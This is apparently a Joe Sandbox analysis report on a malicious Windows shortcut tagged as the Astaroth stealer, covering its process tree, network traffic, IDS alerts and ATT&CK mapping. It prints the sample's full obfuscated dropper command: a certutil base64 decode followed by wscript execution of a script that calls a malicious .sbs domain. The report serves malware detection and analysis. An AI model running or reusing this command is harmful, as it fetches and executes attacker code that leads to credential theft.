Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pyo37mDzQ2.lnk

Overview

General Information

Sample Name:Pyo37mDzQ2.lnk
Analysis ID:795108
MD5:d52ac7755bd61b035235df79fabe1b59
SHA1:4e7a57f7c7fc8ee15cb390337983d116220c7625
SHA256:f3c3d2fae15f05589f8860df40d0533165484fb2975b2204c2f7cca750eb7b51
Tags:AstarothBRAgeoGuildmalnk
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • cmd.exe (PID: 3232 cmdline: C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • certutil.exe (PID: 5148 cmdline: cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS MD5: EB199893441CED4BBBCB547FE411CF2D)
    • wscript.exe (PID: 5188 cmdline: "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.6104.21.40.8349711802851288 01/31/23-12:59:14.367073
SID:2851288
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.40.83 80Jump to behavior
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeDomain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.123.96 443Jump to behavior
Source: TrafficSnort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.6:49711 -> 104.21.40.83:80
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 104.16.123.96 104.16.123.96
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Jan 2023 11:59:15 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=8.000002708286e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnlyServer: cloudflareCF-RAY: 792247b819f291f3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTtP://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000003.253408697.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248160964.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254191636.00000210607A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://niua9f.tabcoperoo.sbs/
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comp
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/M
Source: wscript.exe, 00000003.00000003.253581606.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorP%
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/U
Source: unknownDNS traffic detected: queries for: niua9f.tabcoperoo.sbs
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: C:\Windows\System32\certutil.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jSJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: classification engineClassification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
Source: wscript.exe, 00000003.00000003.253581606.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.000002106078D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.40.83 80Jump to behavior
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeDomain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.123.96 443Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\9cea9ja\>nul 2>&1 &&s^et seeh=c:\9cea9ja\^9cea9ja.^js&&echo dmfyienms3i9innjiisicii7rgzlcj0iaxaikyj0omgio0vms3i9ilqikyj0ucirijoio0dlde9iamvjdchdzktyk0rms3irrwzlcisily9uaxvhowyudgfiy29wzxjvby5zynmvpzeviik7>!seeh!&&certutil -f -deco^de !seeh! !seeh!&&ca^ll !seeh!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jSJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
Path Interception111
Process Injection
111
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer3
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
hTtP://niua9f.tabcoperoo.sbs/?1/0%Avira URL Cloudsafe
http://niua9f.tabcoperoo.sbs/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.cloudflare.com
104.16.123.96
truefalse
    high
    niua9f.tabcoperoo.sbs
    104.21.40.83
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://niua9f.tabcoperoo.sbs/?1/true
        unknown
        https://www.cloudflare.com/cdn-cgi/errorfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          hTtP://niua9f.tabcoperoo.sbs/?1/wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://niua9f.tabcoperoo.sbs/wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.cloudflare.com/cdn-cgi/errorP%wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://www.cloudflare.com/wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://www.cloudflare.com/cdn-cgi/errore.com/Uwscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://www.cloudflare.com/Mwscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.40.83
                  niua9f.tabcoperoo.sbsUnited States
                  13335CLOUDFLARENETUStrue
                  104.16.123.96
                  www.cloudflare.comUnited States
                  13335CLOUDFLARENETUSfalse
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:795108
                  Start date and time:2023-01-31 12:58:15 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 3m 10s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:4
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:Pyo37mDzQ2.lnk
                  Detection:MAL
                  Classification:mal68.evad.winLNK@6/1@2/2
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .lnk
                  • Stop behavior analysis, all processes terminated
                  • Exclude process from analysis (whitelisted): conhost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  104.16.123.96https://cblay.clickfunnels.com/auto-webinar-registration1674809143095Get hashmaliciousBrowse
                    eJHvz7JQmR.lnkGet hashmaliciousBrowse
                      8XJE1azNII.cmdGet hashmaliciousBrowse
                        bwlUlnek8c.lnkGet hashmaliciousBrowse
                          https://eferreira.clickfunnels.com/webinar-registrationdxyd7k9qGet hashmaliciousBrowse
                            https://mail.turing.com/api/analytics?ti=d554d536f06a156d824003d0c664b257c1ebe0746f5c636f01cb954c5f0c4b684821ae3ba8e679c9e7728c86aa69b0b0eed472c96393f62a0c431339782e0ac4d40f4a8cad32476fff07a90a24abc253eae29ade09a4a164d68248967df03bc0b5257f664b57a390cc3682f8eca1aefd040988f60d0b6f829267aae6229c4d&rd=http://www.Xcelenergy325.pageworks.com.au/cindy.a.hoffman/Y2luZHkuYS5ob2ZmbWFuQHhjZWxlbmVyZ3kuY29tGet hashmaliciousBrowse
                              https://www.sipps.it/?download=1&kccpid=5733068&kcccount=///h7u77d.codesandbox.io?e=Y291cnRuZXkud2FyZGVuQGJhcm5ldC5nb3YudWs=Get hashmaliciousBrowse
                                WwfWmiTrIv.lnkGet hashmaliciousBrowse
                                  scan.htmlGet hashmaliciousBrowse
                                    http://object.fmGet hashmaliciousBrowse
                                      Doc_____________35665765676890.htmlGet hashmaliciousBrowse
                                        https://ncv.microsoft.com/D0Tkg9Sdp5Get hashmaliciousBrowse
                                          https://t.co/maqFmmM3uLGet hashmaliciousBrowse
                                            WGpE5BNqYf.lnkGet hashmaliciousBrowse
                                              Check#23743_PymntCopy_pdf.htmlGet hashmaliciousBrowse
                                                Wire confirmation-Wednesday040123-818793 fdp.htmGet hashmaliciousBrowse
                                                  malicious 2.htmlGet hashmaliciousBrowse
                                                    https://www.bing.com/ck/a?!&&p=c9c2566e4ab710b4JmltdHM9MTY3Mjc5MDQwMCZpZ3VpZD0xZGI0MmQwZi0yMjEwLTZhMjQtMzZhNC0zZjgwMjNlZDZiOGMmaW5zaWQ9NTE2NA&ptn=3&hsh=3&fclid=1db42d0f-2210-6a24-36a4-3f8023ed6b8c&u=a1aHR0cHM6Ly95MHRkN2cuY29kZXNhbmRib3guaW8vP3FsPWRhdmlkZnVuZ0BoYW5nbHVuZy5jb20NGet hashmaliciousBrowse
                                                      https://publicate.it/p/Q57k5w5TLEm.328992Get hashmaliciousBrowse
                                                        NEW VOICEMAIL _MP3_1252022 92955 a.m..htmlGet hashmaliciousBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          niua9f.tabcoperoo.sbsx6V6IyDvkG.cmdGet hashmaliciousBrowse
                                                          • 172.67.182.146
                                                          www.cloudflare.comx6V6IyDvkG.cmdGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          https://cblay.clickfunnels.com/auto-webinar-registration1674809143095Get hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://ppleche.blob.core.windows.net/kjhg/trial.html?sp=r&st=2023-01-26T17:09:13Z&se=2023-03-07T01:09:13Z&spr=https&sv=2021-06-08&sr=b&sig=j50cMPgmBCzZqE3hQzNzmyEzW0Ct%2FE7o0zy7ah7TYOA%3DGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          http://ogs0inwufq6399dabccaca6.crashtrs.ruGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          eJHvz7JQmR.lnkGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          8XJE1azNII.cmdGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          bwlUlnek8c.lnkGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://eferreira.clickfunnels.com/webinar-registrationdxyd7k9qGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://mail.turing.com/api/analytics?ti=d554d536f06a156d824003d0c664b257c1ebe0746f5c636f01cb954c5f0c4b684821ae3ba8e679c9e7728c86aa69b0b0eed472c96393f62a0c431339782e0ac4d40f4a8cad32476fff07a90a24abc253eae29ade09a4a164d68248967df03bc0b5257f664b57a390cc3682f8eca1aefd040988f60d0b6f829267aae6229c4d&rd=http://www.Xcelenergy325.pageworks.com.au/cindy.a.hoffman/Y2luZHkuYS5ob2ZmbWFuQHhjZWxlbmVyZ3kuY29tGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          cL8CyFuzWP.lnkGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          https://www.sipps.it/?download=1&kccpid=5733068&kcccount=///h7u77d.codesandbox.io?e=Y291cnRuZXkud2FyZGVuQGJhcm5ldC5nb3YudWs=Get hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          http://9anime.toGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          jGsBbpdEav.cmdGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          WwfWmiTrIv.lnkGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          http://fmovies.toGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          scan.htmlGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://d8wgyfhda663c06be7f17b7.pacificx.ru/Get hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          http://object.fmGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          Doc_____________35665765676890.htmlGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          (2) EFT Payment Confirmation.htmGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          CLOUDFLARENETUSSAMPLE-KIT.exeGet hashmaliciousBrowse
                                                          • 172.67.201.72
                                                          x6V6IyDvkG.cmdGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          https://api.mixpanel.com/track?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDYyMjAzNDQsICJkaXN0aW5jdF9pZCI6ICJkYWZmY2VjMS0zNWRjLTQ3OTItOThjYy03ODMzZjRjNGM1OGQiLCAibWVzc2FnZV9pZCI6IDE0MDAwOTIsICJ0b2tlbiI6ICJlMzlhMGE0MGQ0OWRmMWNlMjI4ZjBmMWEwNzUwNWVjNCIsICJ0eXBlIjogImVtYWlsIiwgInVybCI6ICJodHRwczovL2F1ZGlvbWFjay5jb20vd29ybGQvcG9zdC9ib3R3LTctMjcifX0=&redirect=http://www.Bein.financerefinance.com.au?pid/a2luZ3JjQGJlaW4uY29tGet hashmaliciousBrowse
                                                          • 104.18.10.207
                                                          as.msiGet hashmaliciousBrowse
                                                          • 1.1.1.1
                                                          ohqt5Srs7g.elfGet hashmaliciousBrowse
                                                          • 104.22.149.27
                                                          VtAedZKmqz.elfGet hashmaliciousBrowse
                                                          • 104.27.81.27
                                                          Paperwork.exeGet hashmaliciousBrowse
                                                          • 104.21.47.166
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          https://mediafire.omaryemen.app/file/ob6whatsapp-download-apk/Get hashmaliciousBrowse
                                                          • 104.17.24.14
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.97.3
                                                          Payment Notice.exeGet hashmaliciousBrowse
                                                          • 104.21.77.241
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          #U30dc#U30a4#U30b9#U30e1#U30c3#U30bb#U30fc#U30b8.htmGet hashmaliciousBrowse
                                                          • 104.17.25.14
                                                          Employee Docu.shtmlGet hashmaliciousBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          Wire_berger_Tuesday-January-2023 0140 AM.shtmlGet hashmaliciousBrowse
                                                          • 104.16.89.20
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          CLOUDFLARENETUSSAMPLE-KIT.exeGet hashmaliciousBrowse
                                                          • 172.67.201.72
                                                          x6V6IyDvkG.cmdGet hashmaliciousBrowse
                                                          • 104.16.124.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
